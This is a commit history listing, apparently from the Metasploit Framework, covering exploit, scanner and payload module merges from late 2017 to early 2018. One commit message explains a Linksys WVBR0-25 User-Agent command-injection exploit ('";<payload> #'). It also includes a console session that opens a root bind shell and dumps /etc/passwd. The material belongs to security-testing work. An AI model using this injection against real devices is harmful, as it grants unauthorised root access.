Commit Graph

23530 Commits (5171e7edd27afcdf64bb1c49e4d0bd455d7b73a2)

Author SHA1 Message Date
bwatters-r7 914f8ba872
Land #9734, Remove unwanted 'pop RAX' from windows/x64/reverse_(win)http 2018-04-04 19:06:17 -07:00
bwatters-r7 4765ffc05a
Land #9595, Add post module RID Hijacking on Windows 2018-04-04 19:06:17 -07:00
Brent Cook ef4fd1dc75
Land #9742, QNX exploit improvements 2018-04-03 09:13:57 -05:00
Brent Cook 9d5ab1dedf
Land #9726, add simple Rex::Tar wrapper for consistency with other archive types 2018-04-03 09:13:56 -05:00
Brent Cook c2bf848ba9
Land #9748, Convert the smbloris DoS into an external module
Help reliability and performance. This some Ruby-specific external module
tooling as a result as well.
2018-04-03 09:13:56 -05:00
Brent Cook 1557540b08
Land #9774, use correct whitespace when patching python meterpreter 2018-04-03 09:13:55 -05:00
Brent Cook d6f23071ca
Land #9718, Add get_user_spns 'kerberoasting' module 2018-04-03 09:13:29 -05:00
William Vu 10ed6637ed
Land #9782, CheckCode::Safe for ms_ndproxy 2018-03-30 08:34:52 -07:00
Brent Cook 9d076f6842
Land #9776, if data is nil, stop reading the heartbleed socket 2018-03-29 09:42:03 -07:00
Jon Hart 36ba1468e8
Land #9760, @h00die's etcd scanner 2018-03-29 09:17:54 -07:00
Jacob Robles 3b87bf5a03
Land #9666, Add 2017-8917 RCE for Joomla 3.7.0 2018-03-29 09:17:54 -07:00
Wei Chen 6108d79dcd
Land #9684, Adding ManageEngine Application Manager RCE
Land #9684
2018-03-27 15:44:50 -07:00
Wei Chen 409ae22a7e
Land #9633, Exodus Wallet Remote Code Execution
Land #9633
2018-03-27 15:44:49 -07:00
Wei Chen 5b1577e46d
Land #9670, Gitstack v2.3.10 RCE
Land #9670
2018-03-27 14:24:23 -05:00
Jacob Robles 71a1ad69dc
Land #9636, Improve post module persistence_exe 2018-03-27 14:21:48 -05:00
William Vu b870091380
Land #9423, PSH for jenkins_xstream_deserialize 2018-03-27 14:21:47 -05:00
William Vu c31a8ab687
Land #9618, pipe auditing improvements 2018-03-27 14:21:47 -05:00
h00die 72d2b46ac8
Land #9767 land magick number blog link update 2018-03-27 14:21:46 -05:00
h00die c56e571b18
Land #9702 exploit for clipbucket 2018-03-27 13:55:43 -05:00
Brent Cook 37576d19a1
Land #9733, rename external templates 2018-03-22 11:18:22 -07:00
Jeffrey Martin d756db4f9d
Land #9613, add bind_named_pipe x86 2018-03-17 20:33:05 -07:00
Brent Cook ef7b77ed01
Land #9529, Add module for HP iLO CVE-2017-12542 authentication bypass 2018-03-17 20:33:05 -07:00
Brent Cook dcb514e5ac
Land #9694, move ssh platforms to lib 2018-03-17 20:33:04 -07:00
Jacob Robles 715279311a
Land #8422, Typo3 News Module Sql Injection exploit 2018-03-15 09:21:14 -07:00
Tim W 8f4895c8e7
Land #9706, bump metasploit payloads to fix #9497 2018-03-13 13:33:29 -07:00
Brent Cook c5e231cfbf
Land #9686, add ipv6 to slowloris, rhost to non-scanner modules 2018-03-13 13:33:28 -07:00
Brent Cook 028d329b4d
Land #9632, owa_login and auth_brute enhancements 2018-03-12 10:14:19 -07:00
Jacob Robles 8c60a73731
varnish anonymous file read 2018-03-09 14:55:11 -06:00
Jacob Robles bcc0a2a94c
Land #7654, varnish file read 2018-03-09 12:53:20 -08:00
Jeffrey Martin 4778de053a
Land #9687, bump payloads, fix PHP meterpreter message parsing 2018-03-07 18:47:47 -08:00
Jacob Robles 49bc0024c1
Land #9678, Add memcached UDP version scanner 2018-03-07 18:47:47 -08:00
Jacob Robles fbee660136
Land #9554, Eclipse Equinoxe OSGi console RCE 2018-03-07 07:49:31 -08:00
Jon Hart 64019d3301
Land #9676, correcting CVE and adding disclosure date for memcached
amplification
2018-03-07 07:49:30 -08:00
Brent Cook f6223c0193
Land #9614, Juniper post enum module 2018-03-07 07:49:29 -08:00
bwatters-r7 9be7bc9b21
Land #9665, Add missing reverse_tcp_rc4 payload tests.
Merge branch 'land-9665' into upstream-master
2018-03-05 15:29:21 -08:00
William Vu d3b4f91b4c
Land #9671, missed code from TelnetEnable refactor 2018-03-05 15:29:21 -08:00
Jon Hart 6909c635bc
Land #9644, @xistence's memcached stats amplification scanner 2018-03-05 15:29:20 -08:00
h00die 2731b91036
Land #9658 spelling and grammar fixes 2018-03-05 07:42:48 -08:00
h00die e57a1fbd43
Land #9650 netgear telnetenable exploit 2018-03-05 07:42:48 -08:00
bwatters-r7 00d5fcfd97
ReLand #9565, Reverse TCP x64 RC4 via max3raza's rc4_x64 asm
This reverts commit 7964868fcd.
2018-03-02 17:46:46 -06:00
bwatters-r7 d2150c8d15
Revert "Land #9565, Reverse TCP x64 RC4 via max3raza's rc4_x64 asm"
This reverts commit fcc579377f, reversing
changes made to 95cd149378.
2018-03-02 17:45:58 -06:00
bwatters-r7 4841f29190
Land #9565, Reverse TCP x64 RC4 via max3raza's rc4_x64 asm 2018-03-02 16:41:33 -06:00
William Vu 3fd2862f76
Land #9639, multi/handler exit on disabled handler
If DisablePayloadHandler is set, abort instead of hanging.
2018-03-01 07:48:02 -08:00
Sonny Gonzalez 667cc5bcca
Land #9653, fix Y2k38 issue (until Jan 1, 2038) 2018-03-01 09:28:11 -06:00
Wei Chen 735fbc5c9f
Land #9623, Support Win 2008/7+ for enum_ms_product_keys
Land #9623
2018-02-25 23:25:03 -08:00
Brent Cook bffba1e5e3
Land #9607, upgrade osx shells to osx meterpreter 2018-02-25 23:25:02 -08:00
William Vu 0a5e9d922f
Land #9601, ms17_010_eternalblue reliability fixes 2018-02-23 08:31:02 -08:00
Brent Cook 2af4f56382
Land #9611, Fix bug causing all OWA logins to appear valid 2018-02-23 08:31:01 -08:00
bwatters-r7 ac6fede928
Land #9441, Create exploit for AsusWRT LAN RCE
Merge branch 'land-9441' into upstream-master
2018-02-23 08:31:01 -08:00
Jacob Robles 178afdaed1
Land #9604, Fix logged errors when running without Python 3.6 / gmpy2 2018-02-22 08:27:37 -08:00
Brent Cook a189673782
Land #9584, Fix reverse_php_ssl infinite loop 2018-02-22 08:27:36 -08:00
Brent Cook 826b986018
Land #9602, Create sessions with the Fortinet SSH backdoor scanner 2018-02-22 08:27:36 -08:00
Brent Cook 4e8fe54c6c
Land #9524, prefer 'shell' channels over 'exec' channels for ssh CommandStream 2018-02-22 08:27:36 -08:00
William Vu c1d701f656
Land #9593, finger_users regex fix 2018-02-22 08:27:35 -08:00
Aaron Soto dc913b60e4
Land #9444 - `hsts_eraser` module and docs 2018-02-22 08:27:35 -08:00
Jacob Robles 40220b5ab6
Land #9594, CloudMe Sync v1.10.9 Buffer Overflow 2018-02-22 08:27:35 -08:00
Jacob Robles 72cb9f358e
Land #9561, Disk Savvy Enterprise v10.4.18 built-in server buffer overflow 2018-02-22 08:27:34 -08:00
Brent Cook 59a41f04f7 Land #9366, Add x64 staged Meterpreter for macOS 2018-02-20 09:24:41 -06:00
Brent Cook 8c2484d2da
Land #9164, add OWA 2016 support 2018-02-20 09:24:13 -06:00
Chris Higgins d2c203bcb9
Lands #9504, MagniComp SysInfo privilege escalation 2018-02-20 09:24:13 -06:00
Brent Cook d89a8c3eb9
Land #9571, specify a python encoding for the claymore DoS module 2018-02-16 15:34:49 -08:00
Brent Cook d2e71cfc8b
Land #9512, Add Claymore Dual GPU Miner<= 10.5 DoS module 2018-02-16 15:34:48 -08:00
Brent Cook 31ed50ac92
Land #9539, add bind_named_pipe transport to Windows meterpreter 2018-02-16 15:34:47 -08:00
Wei Chen 004e228a52
Land #9509, Ulterius Server < v1.9.5.0 Directory Traversal
Land #9509
2018-02-16 15:34:47 -08:00
Brent Cook e8ad3a98e9
Land #9558, Fix #9417, map timeout exp to a var for telnet_encrypt_overflow 2018-02-15 14:14:07 -08:00
Brent Cook 87dcb13413
update magic numbers 2018-02-15 15:25:47 -06:00
Brent Cook 0cee8485d0
Land #9557, add back udp_probe for now 2018-02-14 11:26:59 -08:00
Spencer McIntyre bdc0b47844
Land #9552, add private_type for stored tomcat pw
Fixes #9513
2018-02-13 19:55:54 -08:00
Jeffrey Martin aecc1f143f
Land #7699, Add UDP handlers and payloads (redux) 2018-02-13 14:46:07 -08:00
Jacob Robles f281b45384
Land #9546, Correct Typo 2018-02-13 14:46:07 -08:00
Jacob Robles e485b152e3
Land #9542, Correct Typo 2018-02-13 14:46:06 -08:00
h00die 37cb2d77e7
Land #9422 abrt race condition priv esc on linux 2018-02-12 11:55:21 -06:00
Pearce Barry 6c3168c541
Land #9536, Add Ubuntu notes to documentation 2018-02-12 11:55:19 -06:00
Pearce Barry 73bcec5d11
Land #9408, Add Juju-run Agent Privilege Escalation module (CVE-2017-9232) 2018-02-12 11:55:19 -06:00
h00die 090f7c8bd6
Land #9467 linux priv esc against glibc origin 2018-02-12 11:55:19 -06:00
h00die cd7187023c
Land #9469 linux local exploit for glibc ld audit 2018-02-12 11:55:18 -06:00
Brent Cook 32bd516e70
Land #9525, Update mysql_hashdump for MySQL 5.7 and above 2018-02-12 11:55:17 -06:00
Adam Cammack cd723ac86e Add scanner for Bleichenbacher oracle (ROBOT) 2018-02-09 11:14:30 -06:00
Brent Cook b696665adc
Land #9478, Improve Dup Scout BOF exploit 2018-02-08 10:25:39 -06:00
Brent Cook 909b787a56
Land #9521, flush pipe buffers when a process exists in mettle 2018-02-08 10:25:25 -06:00
William Vu 6c350be24e
Land #9473, new MS17-010 aux and exploit modules 2018-02-02 11:32:40 -06:00
h00die 016af01fd8
Land #9399 a linux priv esc against apport and abrt 2018-02-02 11:32:29 -06:00
Brent Cook ce3d5d77e4
Land #9481, Update native DNS spoofer for Dnsruby 2018-02-02 11:32:18 -06:00
Brent Cook ec12d61702
Land #9354, Debut embedded httpd server (Brother printers) DoS 2018-02-02 11:31:59 -06:00
bwatters-r7 64746d8325
Land # 9407, Add BMC Server Automation RSCD Agent RCE exploit module
Merge branch 'land-9407' into upstream-master
2018-02-01 11:23:59 -06:00
h00die b7fbffa331
Land #9445 fixes for ssl labs scanner module 2018-02-01 11:23:46 -06:00
Jacob Robles 4fa68f29d9
Land #9457, Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow 2018-02-01 11:23:26 -06:00
Aaron Soto 395320ba97 Land #9379, Oracle Weblogic RCE exploit and documentation 2018-01-26 18:08:56 -06:00
William Vu a87ae41d81 Land #9446, Post API fix for setuid_nmap 2018-01-26 18:08:47 -06:00
Matthew Kienow b515a582f0
Land #9424, Add SharknAT&To external scanner 2018-01-24 17:20:03 -06:00
Pearce Barry 926ce42a01
Land #8632, colorado ftp fixes 2018-01-24 17:13:20 -06:00
bwatters-r7 2ea9ab2625
Land #9416, Sync Breeze Enterprise 9.5.16 Import Command buffer overflow
Merge branch 'land-9416' into upstream-master
2018-01-24 17:13:16 -06:00
Adam Cammack a4022f7b8f
Land #9430, Improve Hyper-V checkvm checks 2018-01-24 17:13:12 -06:00
bwatters-r7 a136841794
Land #9114, Add module for Kaltura <= 13.1.0 RCE (CVE-2017-14143)
Merge branch 'land-9114' into upstream-master
2018-01-24 17:13:00 -06:00
Brent Cook d6beb94c59
Land #6611, add native DNS to Rex, MSF mixin, sample modules 2018-01-24 17:12:52 -06:00
Brent Cook 5ec3da843e
Land #9349, GoAhead LD_PRELOAD CGI Module 2018-01-24 17:12:47 -06:00
Brent Cook 294a8e0ada
Land #9413, Expand the number of class names searched when checking for an exploitable JMX server 2018-01-24 17:12:43 -06:00
Brent Cook bb73d2c07e
Land #9431, Fix owa_login to handle inserting credentials for a hostname 2018-01-24 17:12:39 -06:00
Brent Cook 47682e3f37
Land #9404, update module author 2018-01-24 17:12:34 -06:00
Wei Chen ab610f599b
Land #9442, Remove NoMethod Rescue for cerberus_sftp_enumusers
Land #9442
2018-01-24 17:12:25 -06:00
Wei Chen 10fafb62bb
Land #9436 - Fix cerberus_sftp_enumusers undefined method start for nil
Land #9436

Thanks Steve!
2018-01-24 17:12:16 -06:00
Brent Cook 512192d3b0
Land #9267, Add targets to sshexec 2018-01-24 17:12:12 -06:00
Brent Cook 55c345418d
Land #9438, address cmd_exec inconsistencies 2018-01-24 17:11:40 -06:00
Brent Cook 23619431aa
update stageless python sizes 2018-01-24 17:08:51 -06:00
Brent Cook d6e966b079
Land #9414, wp_admin_shell_upload - remove plugin dir after exploitation 2018-01-16 21:08:22 -06:00
William Vu e5bd36da1c
Land #9402, NIS bootparamd domain name disclosure 2018-01-15 15:36:00 -06:00
Christian Mehlmauer 2f9eebe28b
remove plugin dir 2018-01-15 14:48:59 +01:00
William Vu 736d438813 Address second round of feedback
Brain fart on guard clauses when I've been using them all this time...
Updating the conditions made the ternary fall out of favor.

Changed some wording in the doc to suggest the domain name for a
particular NIS server may be different from the bootparamd client's
configuration.
2018-01-13 22:55:01 -06:00
William Vu 1a8eb7bf2a Update nis_ypserv_map after bootparam feedback
Yes, yes, I see the off-by-one "error." It's more accurate this way.
Basically, we want to ensure there's actually data to dump.
2018-01-13 15:40:17 -06:00
William Vu c080329ee6 Update module after feedback
Looks like I can't decide on certain style preferences.

Not keen on using blank?, but I've used it before. Time to commit?

Also, fail_with has been fixed for aux and post since #8643. Use it!
2018-01-13 15:40:11 -06:00
William Vu eb8429cbd3
Revert "umlaut"
This reverts commit ffd7073420.
2018-01-12 22:57:22 -06:00
Brendan Coles ffd7073420
umlaut 2018-01-13 15:48:45 +11:00
Jeffrey Martin 1f1dc59d17
Land #9392, python meterpreter whitespace normalization 2018-01-12 21:24:13 -06:00
William Vu 2916c5ae45 Rescue Rex::Proto::SunRPC::RPCTimeout
Coincidentally, this also fixes the rescue in the library, since
rescuing Timeout instead of Timeout::Error does nothing.
2018-01-12 19:34:59 -06:00
William Vu 0c9f1d71d3 Add NIS bootparamd domain name disclosure 2018-01-12 19:34:53 -06:00
Agahlot 488f27bf76 Small Typo 2018-01-12 07:05:30 -05:00
Wei Chen e6c4fb1dab
Land #9269, Add a new target for Sync Breeze Enterprise GET BoF
Land #9269
2018-01-11 16:54:23 -06:00
Wei Chen f395e07fc6 Land #9269, add new target for Sync Breeze Enterprise GET BoF
Land #9269
2018-01-11 16:53:02 -06:00
William Vu 4b225c30fd
Land #9368, ye olde NIS ypserv map dumper 2018-01-10 22:02:36 -06:00
William Vu f66b11f262 Nix an unneeded variable declaration 2018-01-10 20:24:02 -06:00
Wei Chen 6510ee53bc
Land #9204, Add exploit for Samsung SRN-1670D (CVE-2017-16524)
Land #9204
2018-01-10 20:15:29 -06:00
Wei Chen 18c179a091 Update module and add documentation
This updates the module to pass:

* msftidy
* Ruby style guidelines
* Proper usage of Metasploit API
* Mostly other cosmetic fixes

A documentation is also added.
2018-01-10 20:13:42 -06:00
William Vu b66889ac86 Rescue additional errors and refactor code
https://jvns.ca/blog/2015/11/27/why-rubys-timeout-is-dangerous-and-thread-dot-raise-is-terrifying/
2018-01-10 20:11:25 -06:00
Wei Chen 7e2c7837e5
Land #9325, Add CVE-2017-6090 phpCollab 2.5.1 file upload exploit module
Land #9325
2018-01-10 17:39:50 -06:00
Wei Chen b1f3f471f3 Update phpcollab_upload_exec code (also module documentation) 2018-01-10 17:38:52 -06:00
Wei Chen dd737c3bc8
Land #9317, remove multiple deprecated modules
Land #9317

The following modules are replaced by the following:

auxiliary/scanner/discovery/udp_probe
is replaced by:
auxiliary/scanner/discovery/udp_sweep

exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload
is replaced by:
exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload

exploit/windows/misc/regsvr32_applocker_bypass_server
is replaced by:
exploits/multi/script/web_delivery
2018-01-10 15:47:20 -06:00
Wei Chen 8d77f35b16
Land #9373, Add LabF nfsAxe FTP Client 3.7 Stack Buffer Overflow
Land #9373
2018-01-09 22:40:50 -06:00
Wei Chen 25280e3319 Update labf_nfsaxe and module documentation 2018-01-09 22:39:40 -06:00
Brent Cook f125e13278
python meterpreter whitespace normalization 2018-01-09 16:08:52 -05:00
Wei Chen 777e383568
Land #9377, Add HPE iMC dbman RestoreDBase Unauthenticated RCE exploit
Land #9377
2018-01-09 13:56:53 -06:00
Wei Chen a0c9cdd73d
Land #9376, Add HPE iMC dbman RestartDB Unauthenticated RCE exploit
Land #9376
2018-01-09 13:28:03 -06:00
Brent Cook 573ee28631
Land #9378, Detect and return on bad VNC negotiations 2018-01-09 03:46:00 -05:00
William Vu 4a5a17a8e1 Add NIS ypserv map dumper 2018-01-08 14:27:53 -06:00
Wei Chen d138f1508c
Land #9340, Add exploit for Commvault Remote Command Injection
Land #9340
2018-01-07 12:17:26 -06:00
Daniel Teixeira ff1806ef5f
Update labf_nfsaxe.rb 2018-01-07 16:46:06 +00:00
Daniel Teixeira a69f275a39
Update labf_nfsaxe.rb 2018-01-05 21:14:47 +00:00
Daniel Teixeira c819aebc76
Add files via upload 2018-01-05 21:11:21 +00:00
Daniel Teixeira e797ca4781
Add files via upload 2018-01-05 21:00:47 +00:00
Daniel Teixeira aca76e2a4e
Update labf_nfsaxe.rb 2018-01-05 20:58:36 +00:00
Daniel Teixeira 2643acbc25
Update labf_nfsaxe.rb 2018-01-05 20:55:49 +00:00
Daniel Teixeira b29710c66b
Add files via upload 2018-01-05 20:47:27 +00:00
Daniel Teixeira 94a1198485
Update labf_nfsaxe.rb 2018-01-05 20:41:49 +00:00
Daniel Teixeira b97785c7a9
Update labf_nfsaxe.rb 2018-01-05 18:46:33 +00:00
Daniel Teixeira e7946549d7
Update labf_nfsaxe.rb 2018-01-05 18:31:40 +00:00
jgor 51e5fb450f Detect and return on bad VNC negotiations 2018-01-05 10:12:13 -06:00
Brendan Coles 006514864b Add HPE iMC dbman RestoreDBase Unauthenticated RCE exploit 2018-01-05 11:28:48 +00:00
Brendan Coles 52a5fc9e0a Add HPE iMC dbman RestartDB Unauthenticated RCE exploit 2018-01-05 11:28:14 +00:00
Daniel Teixeira a3fb8b6619
Update labf_nfsaxe.rb 2018-01-04 20:55:38 +00:00
Daniel Teixeira e5bb4bf057
Add files via upload 2018-01-04 20:26:28 +00:00
h00die 65f444ddcc
land #9362 exploit for pfsense graph injection 2018-01-04 14:35:52 -05:00
wetw0rk c9d6d0a7a7 -51 2018-01-04 12:25:31 -06:00
William Vu 366a20a4a4
Fix #9215, minor style nitpick 2018-01-03 23:11:51 -06:00
Brent Cook 520e890520
Land #8581, VMware Workstation ALSA Config File Local Privilege Escalation 2018-01-03 21:35:57 -06:00
Wei Chen b8dde2e650 Land #9360, Ayukov NFTP FTP client buffer overflow vulnerability
Land #9360
2018-01-03 20:56:12 -06:00
Wei Chen 04cf3017c0 Update ayukov_nftp exploit and module documentation 2018-01-03 20:52:57 -06:00
Aaron Soto 7849155347
Land #9359, Improve DCE/RPC fault handling 2018-01-03 20:42:17 -06:00
William Vu c3f10c1d57
Land #9336, Linksys WVBR0-25 exploit 2018-01-03 18:13:44 -06:00
dmohanty-r7 a5fa63405f
Land #9206, Add Xplico RCE exploit module 2018-01-03 16:02:51 -06:00
Adam Cammack a98de2d9a3
Land #9358, Support password protected key files 2018-01-03 15:12:28 -06:00
William Vu a1d43c8f33
Land #9215, new Drupageddon vector 2018-01-03 14:45:32 -06:00
William Vu 84c951cc1d
Land #8059, Postfixadmin alias modification module 2018-01-03 14:29:49 -06:00
wetw0rk 16d709f180 changes+filedropper 2018-01-03 14:09:30 -06:00
wetw0rk 8f0e41e159 requested changes 2018-01-01 17:30:43 -06:00
wetw0rk c47d09717d pfsense graph sploit 2018-01-01 03:18:51 -06:00
Daniel Teixeira 67357e316b
Update ayukov_nftp.rb 2017-12-31 17:48:23 +00:00
Daniel Teixeira 10b2833e7c
Update ayukov_nftp.rb 2017-12-31 17:00:17 +00:00
Daniel Teixeira 21717ae0a2
Create ayukov_nftp.rb 2017-12-31 15:43:16 +00:00
bka-dev 086f657c56
Fix early termination of auxiliary/scanner/dcerpc/hidden
This commit fixes an issue, where auxiliary/scanner/dcerpc/hidden terminates directly, once an endpoint can't be reached or access is denied. Instead the next endpoint in list should be checked, instead of terminating directly.
2017-12-31 14:41:33 +01:00
RageLtMan f2a8d68a1f Permit encrypted SSH keys for login scanner
Net::SSH::KeyFactory permits loading keys using a passphrase.
The Framework SSH modules were implemented back when we had a fork
of net-ssh in our tree, and can now use functionality provided by
the upstream gem.
Update the ssh key login scanner to add a KEY_PASS datastore
OptString which is then passed to the KeyCollection class and used
in the updated :read_key method which now calls the KeyFactory to
read data and give us the appropriate String representation of the
key in the KeyCollection's cache.
A bit of cleanup performed as well, removing legacy code paths no
longer hit by the module. Shamelessly added self to authors, fair
amount of blood and sweat in the SSH subsystem over the years, hope
nobody objects.

Testing:
  None yet
2017-12-31 02:53:06 -05:00
Brendan Coles c153788424 Remove sleeps 2017-12-30 15:20:56 +00:00
Jan-Frederik Rieckers 7f3df74134
fixup! Adding Module for Postfixadmin CVE-2017-5930
Add error handling if request fails

Fix a typo in doc, add default value to doc
2017-12-30 13:04:23 +01:00
h00die 3516305517
land #9191 an exploit against HP LoadRunner magentproc 2017-12-29 16:35:43 -05:00
h00die 4dacc70b9a slight updates to magentproc docs 2017-12-29 16:35:12 -05:00
h00die b698095c49 slight updates to magentproc docs 2017-12-29 16:30:32 -05:00
Jan-Frederik Rieckers 289e887895
Adding Module for Postfixadmin CVE-2017-5930
This exploit allows domain admins to delete protected aliases.
It can be used to redirect aliases like abuse@domain and can aid in
further attacks.
2017-12-29 17:13:59 +01:00
Brent Cook 8de760f1f7
Land #9348, Only use basic auth in couchdb_enum when credentials are provided 2017-12-28 21:24:45 -06:00
Pearce Barry e614e9b732
Land #9268, Update DiskBoss Module (EDB 42395) 2017-12-28 16:39:26 -06:00
Brent Cook c2bb144d0f
Land #9302, Implement ARD auth and add remote CVE-2017-13872 (iamroot) module 2017-12-28 14:11:26 -06:00
james fad4ccece9 Only use basic auth in couchdb_enum when credentials are provided 2017-12-27 20:16:01 -06:00
Jon Hart bbed7db13c
Merge branch 'upstream-master' into feature/mqtt-login 2017-12-27 13:08:44 -08:00
Tod Beardsley e6de25d63b
Land #9316 Cambium modules and mixins, tx @juushya
These cover several of the CVEs mentioned in

https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/
2017-12-26 12:39:51 -06:00
Tod Beardsley 1bb2bb9d2c Oops, no admin in that path 2017-12-26 12:06:45 -06:00
Tod Beardsley 9af88681a2
Move deprecation out 60 days 2017-12-26 11:56:47 -06:00
juushya 8b0f2214b1 few more updates 2017-12-23 03:04:11 +05:30
juushya 038119d9df Use of get_cookies_parsed, changing dirs, marking deprecated in 2 mods, more 2017-12-23 00:14:27 +05:30
Jon Hart d4bc98c13f
Merge branch 'upstream-master' into feature/mqtt-login 2017-12-22 08:07:40 -08:00
b0yd ec7625af9f Damn spaces... 2017-12-22 10:57:11 -05:00
b0yd 2b33b88fa4 Damn spaces 2017-12-22 10:54:31 -05:00
b0yd e088c95a99 Module Cleanup 2017-12-22 10:51:01 -05:00
Jon Hart b29948412e
Correct permissions, fixing warning 2017-12-22 07:27:11 -08:00
b0yd d657a9dc53 Commvault Remote Command Injection 2017-12-22 10:04:13 -05:00
headlesszeke 3dfb836768 Ranking upgrade and uses agent key instead of manually setting user-agent in headers 2017-12-21 23:10:26 -06:00
headlesszeke b31ac73996 Ensure vulnerability check cannot false positive with the power of runtime randomness 2017-12-21 22:53:46 -06:00
William Vu caae33b417
Land #9170, Linux UDF for mysql_udf_payload 2017-12-21 20:48:24 -06:00
headlesszeke 8c3836cc88 Removed msf/core require statement and extraneous debug message 2017-12-21 19:55:56 -06:00
juushya a86abb0297 Implemented get_cookies_parsed 2017-12-22 05:36:36 +05:30
headlesszeke 2ee42e1433
Adds exploit module for CVE-2017-17411
This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.

Example console output:

```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth 
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info

       Name: Linksys WVBR0-25 User-Agent Command Execution
     Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
   Platform: Unix
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-12-13

Provided by:
  HeadlessZeke

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                     yes       The target address
  RPORT    80               yes       The target port
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 1024

Description:
  The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to 
  connect wireless Genie cable boxes to the Genie DVR, is vulnerable 
  to OS command injection in version < 1.0.41 of the web management 
  portal via the User-Agent header. Authentication is not required to 
  exploit this vulnerability.

References:
  http://cvedetails.com/cve/2017-17411/
  http://www.zerodayinitiative.com/advisories/ZDI-17-973
  https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads 

Compatible Payloads
===================

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   cmd/unix/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/generic                          normal  Unix Command, Generic Command Execution
   cmd/unix/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat 
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id

uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.104 - Command shell session 1 closed.  Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic 
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output:  root0:0::/:/bin/sh nobody99:99:Nobody:/:/bin/nologin sshd22:22::/var/empty:/sbin/nologin admin1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
```
2017-12-21 17:44:35 -06:00
Tod Beardsley 5dfb5d581a
Switch get_cookies to get_cookies_parsed
Am I doing it right? See #9333
2017-12-21 09:00:56 -06:00
Jon Hart 962bc71d10
Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 18:58:36 -08:00
Jon Hart 298cb16b1a
Set default USER/PASS files 2017-12-20 18:44:43 -08:00